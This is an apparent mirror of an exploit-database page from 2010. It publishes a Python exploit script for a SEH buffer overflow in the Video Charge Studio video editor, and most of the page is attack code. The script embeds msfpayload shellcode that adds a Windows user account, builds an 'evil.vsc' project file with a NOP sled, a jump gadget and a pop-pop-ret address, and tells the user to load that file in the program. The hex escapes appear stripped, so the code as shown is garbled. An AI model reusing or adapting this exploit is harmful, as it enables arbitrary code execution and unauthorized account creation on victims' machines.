Home / os / win7

[local exploits] - Video Charge Studio <= 2.9.5.643 (.vsc

Posted on 06 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Video Charge Studio &lt;= 2.9.5.643 (.vsc) Buffer Overflow (SEH) | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Video Charge Studio &lt;= 2.9.5.643 (.vsc) Buffer Overflow (SEH) by xsploited security in local exploits | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=============================================================
Video Charge Studio &lt;= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
=============================================================

#!/usr/bin/python
# Exploit Title: Video Charge Studio &lt;= 2.9.5.643 (.vsc) Buffer Overflow (SEH)
# Date: 12/05/2010
# Author: xsploitedsec
# URL: http://www.x-sploited.com/
# Contact: xsploitedsecurity [at] x-sploited.com
# Software Link: http://www.videocharge.com/download/VideoChargeStudio_Install.exe
# Version: &lt;= 2.9.5.643 (Latest)
# Tested on: Windows XP SP3 (Physical machine)
# CVE: N/A
 
### Software Description: ###
# Videocharge Studio is a video editing software which is intended for those users who
# regularly work with video, create Internet video galleries, convert video files.
# Videocharge Studio includes all features for video editing: video converting, splitting
# video into parts, joining several video files into a single one, adding watermark on
# video or image (add logo to video or photo), embedding image into video file, creating
# video from several images, editing audio. Videocharge Studio can edit video without
# reencoding as well.
 
### Exploit information: ###
# Video Charge Studio is prone to a buffer overflow when parsing a malicious vsc files
# &quot;Filename&quot; value field.
# An attacker could trick a user into loading a specially crafted vsc file to execute
# arbitrary code on a users PC without there consent.
 
### Shouts: ###
# kaotix, sheep, deca, havalito, corelanc0d3r/corelan team, exploit-db crew, packetstormsecurity
# Have fun!
 
# &quot;When you know that you&#039;re capable of dealing with whatever comes, you have the only
# security the world has to offer.&quot;                 -Harry Browne
 
import struct
import sys
 
about = &quot;=================================================
&quot;
about +=  &quot; Video Charge Studio &lt;= 2.9.5.643 (.vsc) BoF (SEH)
&quot;
about +=  &quot; Author: xsploited security
 URL: http://www.x-sploited.com/
&quot;
about +=  &quot; Contact: xsploitedsecurity [at] gmail.com
&quot;
about +=  &quot;=================================================
&quot;
print about
 
# msfpayload windows/adduser user=xsploited pass=sec  EXITFUNC=seh
# R | msfencode -e x86/fnstenv_mov -c 1 -t perl -b &#039;x00x09x0a
# x0dx3ex3cx26x20x21x22x23x2ax07&#039; &gt; /tmp/encoded.txt
# [*] x86/fnstenv_mov succeeded with size 302 (iteration=1)
 
shellcode = (
&quot;x6ax46x59xd9xeexd9x74x24xf4x5bx81x73x13xce&quot;
&quot;xcfxb0x91x83xebxfcxe2xf4x32x27x39x91xcexcf&quot;
&quot;xd0x18x2bxfex62xf5x45x9dx80x1ax9cxc3x3bxc3&quot;
&quot;xdax44xc2xb9xc1x78xfaxb7xffx30x81x51x62xf3&quot;
&quot;xd1xedxccxe3x90x50x01xc2xb1x56x2cx3fxe2xc6&quot;
&quot;x45x9dxa0x1ax8cxf3xb1x41x45x8fxc8x14x0exbb&quot;
&quot;xfax90x1ex9fx3bxd9xd6x44xe8xb1xcfx1cx53xad&quot;
&quot;x87x44x84x1axcfx19x81x6exffx0fx1cx50x01xc2&quot;
&quot;xb1x56xf6x2fxc5x65xcdxb2x48xaaxb3xebxc5x73&quot;
&quot;x96x44xe8xb5xcfx1cxd6x1axc2x84x3bxc9xd2xce&quot;
&quot;x63x1axcax44xb1x41x47x8bx94xb5x95x94xd1xc8&quot;
&quot;x94x9ex4fx71x96x90xeax1axdcx24x36xccxa4xce&quot;
&quot;x3dx14x77xcfxb0x91x9exa7x81x1axa1x48x4fx44&quot;
&quot;x75x31xbexa3x24xa7x16x04x73x52x4fx44xf2xc9&quot;
&quot;xccx9bx4ex34x50xe4xcbx74xf7x82xbcxa0xdax91&quot;
&quot;x9dx30x65xf2xa3xabx9exf4xb6xaax90xbexadxef&quot;
&quot;xdexf4xbaxefxc5xe2xabxbdx90xe9xbdxbfxdcxfe&quot;
&quot;xa7xbbxd5xf5xeexbcxd5xf2xeexe0xf1xd5x8axef&quot;
&quot;x96xb7xeexa1xd5xe5xeexa3xdfxf2xafxa3xd7xe3&quot;
&quot;xa1xbaxc0xb1x8fxabxddxf8xa0xa6xc3xe5xbcxae&quot;
&quot;xc4xfexbcxbcx90xe9xbdxbfxdcxfexa7xbbxd5xf5&quot;
&quot;xeexe0xf1xd5x8axcfxbax91&quot;
);
 
header = (
&quot;x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30&quot;
&quot;x22x20x65x6ex63x6fx64x69x6ex67x3dx22x57x69x6ex64x6fx77x73x2d&quot;
&quot;x31x32x35x32x22x20x3fx3ex3cx63x6fx6ex66x69x67x20x76x65x72x3d&quot;
&quot;x22x32x2ex39x2ex35x2ex36x34x33x22x3ex0dx0ax3cx63x6fx6cx73x20&quot;
&quot;x6ex61x6dx65x3dx22x46x69x6cx65x73x22x2fx3ex0dx0ax3cx63x6fx6c&quot;
&quot;x73x20x6ex61x6dx65x3dx22x50x72x6fx66x69x6cx65x73x22x3ex0dx0a&quot;
&quot;x3cx50x72x6fx70x65x72x74x79x20x6ex61x6dx65x3dx22x50x72x6fx66&quot;
&quot;x69x6cx65x22x3ex0dx0ax3cx63x6fx6cx73x20x6ex61x6dx65x3dx22x46&quot;
&quot;x6fx72x6dx61x74x73x22x3ex0dx0ax3cx50x72x6fx70x65x72x74x79x20&quot;
&quot;x6ex61x6dx65x3dx22x46x6fx72x6dx61x74x22x3ex0dx0ax3cx56x61x6c&quot;
&quot;x75x65x20x6ex61x6dx65x3dx22x4ex61x6dx65x22x20x74x79x70x65x3d&quot;
&quot;x22x38x22x20x76x61x6cx75x65x3dx22&quot;
);
 
footer = (
&quot;x22x2fx3ex0dx0ax3cx2fx50x72x6fx70x65x72x74x79x3ex0dx0a&quot;
&quot;x3cx2fx63x6fx6cx73x3ex0dx0ax3cx2fx50x72x6fx70x65x72x74x79x3ex0d&quot;
&quot;x0ax3cx2fx63x6fx6cx73x3ex0dx0ax3cx2fx63x6fx6ex66x69x67x3e&quot;
);
 
size = 824; #824 junk bytes triggers the bof
 
payload = &quot;x90&quot; * (size - len(shellcode));
payload += shellcode
 
payload += &quot;xEBx06x90x90&quot;; #jmp short
payload += struct.pack(&quot;&lt;L&quot;,0x61B8451C); #universal p/p/r - zlib1.dll (Apps path)
payload += &quot;xe9xe0xfcxffxff&quot;; #jmp back 800 bytes
 
xsploit = header + payload  + footer;
 
print(&quot;[*] Creating .vsc file&quot;);
print &quot;[*] Payload size = &quot; + str(len(payload)) + &quot; bytes&quot;;
 
try:
    out_file = open(&quot;evil.vsc&quot;,&#039;w&#039;);
    out_file.write(xsploit);
    out_file.close();
    print(&quot;[*] Malicious vsc file created successfully&quot;);
    print(&quot;[*] Launch Video Charge Studio and load the file
[*] Exiting...
&quot;);
except:
    print &quot;[!] Error creating file&quot;;


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-06]</pre></body></html>

 

TOP